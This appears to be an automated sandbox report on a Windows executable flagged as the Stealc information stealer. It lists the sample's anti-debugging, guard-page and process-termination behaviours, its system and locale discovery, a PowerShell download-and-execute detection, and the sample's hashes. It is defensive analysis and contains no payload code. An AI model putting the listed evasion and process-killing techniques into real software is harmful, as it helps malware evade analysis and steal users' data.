Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00024610 VirtualProtect ?,00000004,00000100,00000000

0_2_00024610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00039BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00039AA0 mov eax, dword ptr fs:[00000030h]

0_2_00039AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00037690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00039790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000398E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_000398E0

Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: gProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00067588 cpuid

0_2_00067588

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00037D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00037B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000379E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_000379E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00037BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00037BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1545720
Product:	CloudBasic
Start time:	21:54:08
Start date:	30.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e7e67024404f23389e4052996e08923a
SHA1:	7b695a106607d413d657ba1ca50401b03df2fafd
SHA256:	114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by